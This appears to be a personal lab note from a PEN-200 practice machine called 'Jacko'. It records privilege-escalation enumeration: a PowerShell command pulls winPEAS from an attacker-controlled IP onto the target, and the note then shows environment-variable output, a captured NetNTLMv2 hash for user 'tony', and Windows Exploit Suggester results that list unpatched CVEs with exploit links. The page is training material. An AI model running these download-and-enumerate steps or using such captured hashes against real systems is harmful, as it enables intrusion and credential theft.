PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\tmp> iwr -Uri http://192.168.45.192/winPEASx86.exe -OutFile C:\tmp\winPEASx86.exe

Delivery complete

Executing PEAS

ENV

����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    Path: C:\Users\tony\AppData\Local\Microsoft\WindowsApps;;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
    WRAPPER_ARCH: x86
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERDOMAIN: JACKO
    PROCESSOR_ARCHITECTURE: x86
    ProgramW6432: C:\Program Files
    DriverData: C:\Windows\System32\Drivers\DriverData
    PUBLIC: C:\Users\Public
    APPDATA: C:\Users\tony\AppData\Roaming
    windir: C:\Windows
    LOCALAPPDATA: C:\Users\tony\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    WRAPPER_BITS: 32
    OneDrive: C:\Users\tony\OneDrive
    USERPROFILE: C:\Users\tony
    ProgramFiles: C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramData: C:\ProgramData
    COMPUTERNAME: JACKO
    WRAPPER_PATH_SEPARATOR: ;
    PROCESSOR_ARCHITEW6432: AMD64
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROMPT: $P$G
    WRAPPER_OS: windows
    SystemRoot: C:\Windows
    ComSpec: C:\Windows\system32\cmd.exe
    TEMP: C:\Users\tony\AppData\Local\Temp
    ProgramFiles(x86): C:\Program Files (x86)
    CommonProgramFiles: C:\Program Files (x86)\Common Files
    TMP: C:\Users\tony\AppData\Local\Temp
    PROCESSOR_REVISION: 0101
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ALLUSERSPROFILE: C:\ProgramData
    SystemDrive: C:
    PSModulePath: C:\Users\tony\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    OS: Windows_NT
    PSExecutionPolicyPreference: Bypass
    USERNAME: SYSTEM
    WRAPPER_FILE_SEPARATOR: \
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\JavaTemp\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS

LSA Protection

Credentials Guard

UAC

PowerShell

NTLM

tony::JACKO:1122334455667788:5e2903d82cc913b83a64185a00aabd91:0101000000000000b8798a4f8c9bdb01201b35b3d0f9a35e000000000800300030000000000000000000000000300000a56182720fa321b79d49a779f0d5032fbe8990181b434f24bb9738542600f9210a00100000000000000000000000000000000000090000000000000000000000

.NET

Token Privileges (`tony`)

Enumerated

Modifiable Services

Installed Programs

Network

Interesting Files / Directories

WES

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ wes --update ; wes ./sysinfo -c --hide "Internet Explorer" Edge Flash -s critical -e
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250322
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
WARNING:root:termcolor module not installed. To show colored output, install termcolor using: pip3 install termcolor
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 1909 for x64-based Systems
    - Generation: 10
    - Build: 18363
    - Version: 1909
    - Architecture: x64-based
    - Installed hotfixes (9): KB4552931, KB4497165, KB4513661, KB4516115, KB4517245, KB4521863, KB4537759, KB4552152, KB4556799
[+] Loading definitions
    - Creation date of definitions: 20250322
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4532938
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows 10 Version 1909 for x64-based Systems
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200313
CVE: CVE-2020-0796
KB: KB4551762
Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows SMB
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html
 
Date: 20200313
CVE: CVE-2020-0796
KB: KB4551762
Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows SMB
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html
 
Date: 20210702
CVE: CVE-2021-1675
KB: KB5003635
Title: Windows Print Spooler Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows Print Spooler Components
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html, http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html
 
Date: 20210702
CVE: CVE-2021-1675
KB: KB5003635
Title: Windows Print Spooler Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows Print Spooler Components
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html, http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html
 
[-] Missing patches: 3
    - KB4551762: patches 2 vulnerabilities
    - KB5003635: patches 2 vulnerabilities
    - KB4532938: patches 1 vulnerability
[I] KB with the most recent release date
    - ID: KB5003635
    - Release date: 20210702
[+] Done. Displaying 5 of the 62 vulnerabilities found.

InfoSec LAB

Explorer

Jacko_Automated

PEAS

ENV

LAPS

LSA Protection

Credentials Guard

UAC

PowerShell

NTLM

.NET

Token Privileges (`tony`)

Modifiable Services

Installed Programs

Network

Interesting Files / Directories

WES

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Jacko_Automated

PEAS

ENV

LAPS

LSA Protection

Credentials Guard

UAC

PowerShell

NTLM

.NET

Token Privileges (tony)

Modifiable Services

Installed Programs

Network

Interesting Files / Directories

WES

Interactive Graph View

Table of Contents

Backlinks

Token Privileges (`tony`)